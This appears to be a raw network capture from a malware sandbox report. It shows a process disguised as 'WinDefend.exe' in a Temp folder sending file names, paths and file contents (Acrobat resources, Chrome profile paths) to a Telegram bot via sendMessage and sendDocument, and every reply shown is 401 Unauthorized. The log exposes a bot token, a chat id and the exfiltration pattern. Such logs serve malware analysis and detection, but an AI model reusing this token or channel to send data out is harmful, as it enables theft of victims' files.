2024-05-23 13:35:03 UTC	206	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 30 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+illustrations_retina.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cillustrations_retina.png%0ASize%3A+10+KB
2024-05-23 13:35:03 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:03 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	61159	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:03 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:03 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+64.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:03 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:03 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	61160	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:03 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="5213a531-cdd9-41ed-b57a-5eab396bc7b4" Host: api.telegram.org Content-Length: 20909 Expect: 100-continue
2024-05-23 13:35:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:03 UTC	40	OUT	Data Raw: 2d 2d 35 32 31 33 61 35 33 31 2d 63 64 64 39 2d 34 31 65 64 2d 62 35 37 61 2d 35 65 61 62 33 39 36 62 63 37 62 34 0d 0a Data Ascii: --5213a531-cdd9-41ed-b57a-5eab396bc7b4
2024-05-23 13:35:03 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 30 34 64 64 62 64 66 66 36 33 39 36 64 39 38 38 30 37 62 63 30 62 36 61 34 61 66 31 39 33 38 63 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 30 34 64 64 62 64 66 66 36 33 39 36 64 39 38 38 30 37 62 63 30 62 36 61 34 61 66 31 39 33 38 63 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=04ddbdff6396d98807bc0b6a4af1938c.png; filename*=utf-8''04ddbdff6396d98807bc0b6a4af1938c.png
2024-05-23 13:35:03 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 70 00 00 01 9a 08 06 00 00 00 8f 24 7e da 00 00 20 00 49 44 41 54 78 9c ed dd 5d 6f 5b 57 be 26 f8 47 c5 c8 4e 5c e5 50 ae 98 9d a8 ca 19 d1 27 81 aa 0f 0e d0 52 ba fb 62 fa 00 d3 5e ee 19 a0 41 60 80 30 73 31 b7 22 51 97 42 23 ca 27 08 fd 09 a2 5c e8 ae 0f 48 dd cc 6d 64 cc 00 04 fa 62 b2 74 71 1a f3 d2 d3 91 7a e6 e0 a0 88 9c 0a 35 99 53 ac 14 9d 58 2c 27 76 1c 86 d1 5c ac 45 9b a2 b9 f6 fb de 6b ed cd e7 07 08 55 21 a9 cd 65 bd 90 8f d6 cb ff bf 72 71 71 01 22 22 22 22 ca 8f 9f d9 1e 00 11 11 11 11 85 c3 00 47 44 44 44 94 33 2f d9 1e 00 51 18 bd c1 78 1b c0 da 82 bb ce 37 d7 57 4f b2 1e 0f 11 11 91 0d 2b dc 03 47 2e e9 0d c6 02 40 55 7f 08 7d f3 9d 08 97 3a d6 ff 7b 02 a0 af ff f7 64 73 7d f5 3c Data Ascii: PNGIHDRp$~ IDATx]o[W&GN\P'Rb^A`0s1"QB#'\Hmdbtqz5SX,'v\EkU!erqq""""GDDD3/Qx7WO+G.@U}:{ds}<
2024-05-23 13:35:03 UTC	4096	OUT	Data Raw: 60 a1 9e 4d 51 4d 7e fc e1 75 c3 5d 32 cb 71 10 11 59 d6 b2 3d 80 84 b5 3c ee 7b 7f b7 39 49 7c 7f b3 9e d9 eb 78 3c 64 5f 87 cb a5 b6 ec 01 8e d2 d7 b7 3d 00 22 a2 2c e8 d9 b7 42 6d cb d1 87 19 3e f6 78 48 27 85 b2 22 fb 30 9f 3c e5 b6 1c 8d 01 8e d2 b6 f4 7f 25 11 d1 d2 68 cd fe c7 e3 c7 8f bd 1e db 4f 73 20 09 6b c1 5c cf ac 0c e0 28 a9 fd 70 bb cd 49 07 c0 8e d7 58 38 fb a6 2c 7b 80 13 b6 07 50 74 42 88 3c 6c d4 25 22 8a 65 d1 ec db 64 32 31 3e 3e 6e 1b a5 2c e9 c0 d4 f0 78 c8 06 80 93 b8 33 71 01 c2 db f1 41 bb c4 d9 37 6d d9 03 1c 11 11 51 12 5a b6 07 90 a6 83 76 e9 08 de 4b a9 1b 00 64 94 3d 71 bb cd c9 da 6e 73 22 e1 1d de 58 4f 74 0e 03 1c 11 11 51 0c c3 e1 70 1b 0b f6 be 95 4a 25 e3 e7 74 bb dd 6a 8a 43 4a c5 41 bb b4 07 ef f6 55 65 00 9f ec 36 Data Ascii: `MQM~u]2qY=<{9I\|x<d_=",Bm>xH'"0<%hOs k\(pIX8,{PtB<l%"ed21>>n,x3qA7mQZvKd=qns"XOtQpJ%tjCJAUe6
2024-05-23 13:35:03 UTC	4096	OUT	Data Raw: 44 33 76 9b 93 0e bc f7 5f 9d 01 d8 e6 1f 16 e9 b2 7d 98 61 de 64 32 c1 e7 9f 7f fe e0 d1 a3 47 61 66 93 a6 4b ab 9d 3c ee 2d ff 0c d1 00 00 20 00 49 44 41 54 91 d3 7b dc a6 c1 2d f0 f7 e1 fa f5 eb 0f de 7e fb ed 9b 21 97 4c 67 7d 50 a9 54 f6 a3 7e 72 1c b9 08 70 00 43 9c eb 0a 1c e0 fc da bb 71 99 8a ac 0a b0 bc 7f ff a0 5d ca 7c 7f ce b2 b1 7d 98 61 91 87 0f 1f 3e ee f7 fb e3 c9 64 12 36 58 de 87 9a 91 eb a4 30 ac c4 e8 d9 b6 3a 54 68 0b b2 37 f4 99 52 a9 34 7a fb ed b7 cb 11 67 dd a6 46 00 aa 59 1f 5e 98 ca 4d 80 03 9e 2d a7 4a 38 f2 57 0e 3d 57 c4 00 a7 37 8d 7b 6d 4e e6 cc 1b 39 21 c0 4c dc 5d 1e aa 49 d7 70 38 ac 02 f8 c2 f6 38 e6 4d 26 13 0c 06 83 d1 1f ff f8 c7 28 ef 9b d3 1e bc 47 00 a4 0b 4b ac 33 a1 4d 20 42 bf e9 95 95 95 c7 af bf fe fa f8 d6 Data Ascii: D3v_}ad2GafK<- IDAT{-~!Lg}PT~rpCq]\|}a>d6X0:Th7R4zgFY^M-J8W=W7{mN9!L]Ip88M&(GK3M B
2024-05-23 13:35:03 UTC	4096	OUT	Data Raw: 23 22 22 9a 93 7a 80 8b d8 9c fc 63 a8 37 f8 42 05 b7 59 73 33 71 8b 02 d0 96 94 72 5f 08 e1 dc 06 7d 3d ee 7d 84 2b be 1b 25 90 7b 05 b4 c2 05 7b 22 22 a2 a0 52 69 66 3f b3 c7 ad 81 e8 65 23 a6 27 10 5f d8 17 55 24 7a 96 e9 33 8f 87 bc e7 ca a1 06 fd 7d dd 47 b8 7d 6e 67 50 01 fe 28 4c e0 d2 21 f1 53 d3 35 85 10 d5 10 63 20 22 a2 88 76 9b 93 85 41 e1 a0 5d 4a a4 39 7b d1 9a d9 67 25 f1 19 b8 08 7b dc 4c b6 f4 c7 fb 52 ca 33 7d cd 4e d1 66 5d f4 e9 d4 26 80 b6 e1 21 1d 17 f6 c3 05 68 0f 36 6f 04 60 2f c6 a1 93 56 c4 fb 88 88 88 0a 2f b1 19 b8 88 b3 33 61 05 de 3f 95 37 ba 54 86 e9 6b 77 4f 17 04 ce 9c fe be 76 10 bc ed 55 ec bd 8b 9c 7d 23 22 72 47 da 33 70 14 4d 22 9d 18 f4 9b bc 44 ba e1 0d 50 b3 3f 3b 00 be 90 52 ee eb e7 2d 04 21 44 03 6a d9 78 11 2b Data Ascii: #""zc7BYs3qr_}=}+%{{""Rif?e#'_U$z3}G}ngP(L!S5c "vA]J9{g%{LR3}Nf]&!h6o`/V/3a?7TkwOvU}#"rG3pM"DP?;R-!Djx+
2024-05-23 13:35:03 UTC	4096	OUT	Data Raw: f6 71 16 7d 63 29 80 8b 8b 20 33 13 69 1b 01 a8 eb b1 10 a5 46 6f db 10 60 88 23 72 46 94 3d 70 a6 fa 69 00 d0 c9 63 91 47 8f 0e 11 5b 59 be 18 e9 f0 66 5a 3a ba 54 e9 b8 00 00 0f e4 49 44 41 54 1d c1 9d f2 26 04 00 17 17 7d f8 bf a9 a5 65 04 40 e8 31 10 a5 8e 21 8e c8 2d a1 03 9c fe 25 be 67 b8 bb 8c fc 9e 90 34 cd 2c 66 d2 0d c1 27 bc 01 40 23 8f 27 7d 0b ef e2 22 c8 9b 5a d2 a6 e1 8d 87 59 28 53 0c 71 44 ee 88 74 0a 55 17 ea 35 ed ff d9 d2 61 24 6f a4 e1 f6 54 03 9c 94 72 5b 4a 79 02 ef f0 76 e8 42 1f 59 32 c8 36 c4 31 bc 91 55 0c 71 44 6e 88 53 46 c4 6b ff cf 8e 43 ed a8 82 ea 1b 6e 4f e5 05 48 4a b9 a6 83 ee 67 f0 6e 4f 76 0a ef 65 6b 72 41 36 21 8e e1 8d 9c c0 10 47 64 5f e4 00 a7 37 d3 37 3c 1e d2 ce d9 a1 86 be e1 76 91 e4 93 e8 e0 d6 d2 cf e7 35 Data Ascii: q}c) 3iFo`#rF=picG[YfZ:TIDAT&}e@1!-%g4,f'@#'}"ZY(SqDtU5a$oTr[JyvBY261UqDnSFkCnOHJgnOvekrA6!Gd_77<v5
2024-05-23 13:35:03 UTC	53	OUT	Data Raw: ed 31 10 11 11 11 51 08 9c 81 23 22 22 22 ca 19 06 38 22 22 22 a2 9c 61 80 23 22 22 22 ca 99 ff 1f 93 30 38 77 ba 5e 19 34 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: 1Q#"""8"""a#"""08w^4IENDB`
2024-05-23 13:35:03 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 32 31 33 61 35 33 31 2d 63 64 64 39 2d 34 31 65 64 2d 62 35 37 61 2d 35 65 61 62 33 39 36 62 63 37 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --5213a531-cdd9-41ed-b57a-5eab396bc7b4Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:03 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:03 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:03 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	61162	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:04 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9c5ad812-cec1-4484-bd82-61b08eacc398" Host: api.telegram.org Content-Length: 10736 Expect: 100-continue
2024-05-23 13:35:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:04 UTC	40	OUT	Data Raw: 2d 2d 39 63 35 61 64 38 31 32 2d 63 65 63 31 2d 34 34 38 34 2d 62 64 38 32 2d 36 31 62 30 38 65 61 63 63 33 39 38 0d 0a Data Ascii: --9c5ad812-cec1-4484-bd82-61b08eacc398
2024-05-23 13:35:04 UTC	127	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 5f 72 65 74 69 6e 61 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=illustrations_retina.png; filename*=utf-8''illustrations_retina.png
2024-05-23 13:35:04 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 04 b0 08 03 00 00 00 5f 07 90 c2 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 63 50 4c 54 45 ff ff ff bb bb bb 99 99 99 fb 69 37 bb bb bb 99 99 99 bb bb bb c6 ad a5 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 bb bb bb 99 99 99 81 66 3c c5 00 00 00 21 74 52 4e 53 00 11 11 11 22 22 33 33 33 44 44 55 55 66 66 77 77 88 88 99 99 aa aa bb bb cc cc dd dd ee ee ff ff 66 4f 64 ac 00 00 00 09 70 48 59 73 00 00 0a 4d 00 00 0a 4d 01 b5 93 e4 c6 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 Data Ascii: PNGIHDR_sBITOcPLTEi7f<!tRNS""333DDUUffwwfOdpHYsMMtEXtSoftwareAdobe Firewor
2024-05-23 13:35:04 UTC	4096	OUT	Data Raw: f3 f5 0c 47 a7 ec 10 6b b3 3b dc dc 05 62 bb eb 7b 2f 2b 66 71 c8 cd 21 74 c7 ef 7c 77 73 10 39 24 b4 d9 7d 30 e0 bf 8e 5e d7 fd e3 a7 f7 5f 6b 1a c8 23 c3 fb d1 81 b9 09 1d 56 40 e8 b0 02 42 87 15 10 3a ac 80 d0 61 05 84 0e 2b 20 74 58 01 a1 c3 0a 08 1d 56 40 e8 b0 02 42 87 15 10 3a ac 80 d0 61 05 84 0e 2b 20 74 58 01 a1 c3 0a 08 1d 56 40 e8 b0 02 42 87 15 10 3a ac 80 d0 61 05 84 0e 2b 20 74 58 01 a1 c3 0a 08 1d 56 40 e8 b0 02 42 87 15 10 3a ac 80 d0 61 05 84 0e 2b 20 74 58 01 a1 c3 0a 34 86 7e 3f f7 56 01 49 dd 09 1d 96 af 31 f4 f3 dc 5b 05 24 75 db 14 fa c3 dc 5b 05 24 25 74 58 81 9b c6 d0 37 73 6f 16 90 d2 51 e8 b0 7c cd a1 5f cd bd 59 40 4a cd a1 6f e7 de 2c 20 a5 83 d0 61 f9 f6 8d a1 ef e6 de 2c 20 25 a1 c3 0a ec 0c c6 c1 f2 5d 35 75 6e 0a 2c 2c cc Data Ascii: Gk;b{/+fq!t\|ws9$}0^_k#V@B:a+ tXV@B:a+ tXV@B:a+ tXV@B:a+ tX4~?VI1[$u[$%tX7soQ\|_Y@Jo, a, %]5un,,
2024-05-23 13:35:04 UTC	2192	OUT	Data Raw: df 5f 4b 7d 47 3a 71 e8 cd 77 ff 67 ba bb 26 f4 78 42 8f d3 23 f4 c0 59 70 e2 1b e9 69 3b 0f dc 46 9f 69 d0 5d e8 f1 84 1e a7 47 e8 81 3b 55 89 ef af a5 0d 3d b0 cd fb b4 db dc 5b 85 3b a9 d0 97 a5 47 e8 81 d1 b8 c4 c3 ee 69 43 0f 0c ba cf 34 16 27 f4 78 42 8f d3 23 f4 c0 63 2d b7 69 37 24 6d e8 cd 63 71 33 3d d2 22 f4 04 84 1e a7 4f e8 b7 39 aa 49 1b 7a 96 bf 4d fd 55 b8 93 0a 7d 59 fa 84 1e b8 e0 4d 7b 1e 9c b4 f3 c0 24 9f b9 2e d1 85 1e 4f e8 71 fa 84 9e e5 22 3d 69 e8 85 5d a2 57 1b 7a ac d4 db 93 f0 e7 ad 4d 9f d0 03 77 d2 d3 4e 99 49 1a 7a f3 25 fa 5c 77 d1 85 9e 6a 7b 12 fe bc b5 e9 15 7a e0 00 99 f4 4e 7a ca ce 03 77 d1 8f 29 b7 77 90 0a 77 52 a1 2f 4b af d0 03 cb b5 24 7d 42 24 65 e8 81 47 d7 b6 29 b7 77 90 0a 77 52 a1 2f 4b af d0 03 cb 49 25 1d Data Ascii: _K}G:qwg&xB#Ypi;Fi]G;U=[;GiC4'xB#c-i7$mcq3="O9IzMU}YM{$.Oq"=i]WzMwNIz%\wj{zNzw)wwR/K$}B$eG)wwR/KI%
2024-05-23 13:35:04 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 63 35 61 64 38 31 32 2d 63 65 63 31 2d 34 34 38 34 2d 62 64 38 32 2d 36 31 62 30 38 65 61 63 63 33 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --9c5ad812-cec1-4484-bd82-61b08eacc398Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:04 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:04 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 63 35 61 64 38 31 32 2d 63 65 63 31 2d 34 34 38 34 2d 62 64 38 32 2d 36 31 62 30 38 65 61 63 63 33 39 38 2d 2d 0d 0a Data Ascii: --9c5ad812-cec1-4484-bd82-61b08eacc398--
2024-05-23 13:35:04 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:04 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	61163	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:04 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="01237f47-e54f-454d-b415-d19b99060966" Host: api.telegram.org Content-Length: 4093 Expect: 100-continue
2024-05-23 13:35:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:04 UTC	40	OUT	Data Raw: 2d 2d 30 31 32 33 37 66 34 37 2d 65 35 34 66 2d 34 35 34 64 2d 62 34 31 35 2d 64 31 39 62 39 39 30 36 30 39 36 36 0d 0a Data Ascii: --01237f47-e54f-454d-b415-d19b99060966
2024-05-23 13:35:04 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=64.png; filename*=utf-8''64.png
2024-05-23 13:35:04 UTC	3777	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0e 88 49 44 41 54 78 9c ed 5b 6d 8c 1d d7 59 7e 9e 33 73 3f 76 ef ae d7 b1 d3 c6 4e e4 2a a0 e0 40 1a 88 42 41 8a 2a 48 5a 9a 56 14 21 b5 02 4c 90 da 5f 20 84 f8 51 7e 22 54 21 e1 f0 0b fe 20 f1 21 d1 b4 4a 69 8a e4 8a 5a 29 6a 41 89 da a6 d4 4d 5b cb 31 49 11 6a 0a 48 09 c4 49 03 8e 13 3b f6 ae 77 f7 de bd 77 e6 7d f8 71 ce 99 39 33 77 ee da 0e 08 21 75 8f b4 bb 33 77 ce c7 fb bc 1f cf fb 9e 73 67 81 bd b6 d7 f6 da 5e db 6b 7b ed 07 b6 f1 ad 0c 52 73 5c 63 8e 93 00 8f 1d 4b 3f 69 dc f8 1e 37 d2 4e 36 47 1d 03 34 2f 4e 25 48 fb d9 5b 6f 02 9c 8e 21 13 90 fd af 4d fa 7f dc 04 2f bf 00 b7 a8 cf 9c 07 1c 07 dc 71 c0 da 9f 7f 5e ca 8e 7d e6 33 3d 6c bf 9c Data Ascii: PNGIHDR@@iqIDATx[mY~3s?vN@BAHZV!L_ Q~"T! !JiZ)jAM[1IjHI;ww}q93w!u3wsg^k{Rs\cK?i7N6G4/N%H[o!M/q^}3=l
2024-05-23 13:35:04 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 30 31 32 33 37 66 34 37 2d 65 35 34 66 2d 34 35 34 64 2d 62 34 31 35 2d 64 31 39 62 39 39 30 36 30 39 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --01237f47-e54f-454d-b415-d19b99060966Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:04 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:04 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 30 31 32 33 37 66 34 37 2d 65 35 34 66 2d 34 35 34 64 2d 62 34 31 35 2d 64 31 39 62 39 39 30 36 30 39 36 36 2d 2d 0d 0a Data Ascii: --01237f47-e54f-454d-b415-d19b99060966--
2024-05-23 13:35:05 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:04 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	61164	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:04 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:04 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 30 37 31 63 33 34 32 39 64 34 39 30 30 65 39 61 35 63 30 64 34 65 32 31 30 35 63 63 66 31 63 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 30 37 31 63 33 34 32 39 64 34 39 30 30 65 39 61 35 63 30 64 34 65 32 31 30 35 63 63 66 31 63 32 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 31 2b Data Ascii: chat_id=1655240967&text=File%3A+071c3429d4900e9a5c0d4e2105ccf1c2.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C071c3429d4900e9a5c0d4e2105ccf1c2.png%0ASize%3A+11+
2024-05-23 13:35:05 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:05 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
